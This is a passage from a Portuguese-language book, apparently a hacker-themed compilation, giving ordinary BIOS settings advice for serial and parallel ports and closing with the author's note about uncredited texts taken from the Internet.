deverá desabilitar a porta serial 2 da placa-mãe para não dar
Terrorismo Tecnológico 474
Aprenda Para Sobreviver

conflito, o que é feito através dessa opção. Se não for esse o


caso, deixe em "Auto" ou "COM2" ou "2F8".

• Serial Port 1 MIDI Support: Habilita a compatibilidade da porta


serial 1 com a interface MIDI. Deixar desabilitado.

• Serial Port 2 MIDI Support: Idem.

• rallel Port: Configura a porta paralela do micro. Deixe em


"Auto" ou "LPT1" ou "378".

• Parallel Port Mode: Configura o modo de operação da porta


paralela, normal ("Normal" ou "SPP") ou
bidirecional ("Extended" ou "ECP/EPP"). Sugerimos
configurar em modo bidirecional.

• Parallel Port Extended Mode: Configura o modo bidirecional


que será utilizado pela porta paralela, EPP ou ECP.
Sugerimos configurar em modo ECP, que oferece melhor
desempenho.
Terrorismo Tecnológico 475
Aprenda Para Sobreviver

Como eu já disse durante o livro, muitos textos foram retirados da


Internet e esses apesar de conter informações verdadeiras, muitos
estavam com o IP falso e sem mencionar o autor. Se você for um
deste me mande um e-mail e colocarei o seu nome nas próximas
edições.

http://www.leandro-t.cjb.net/
leandro_t@terra.com.br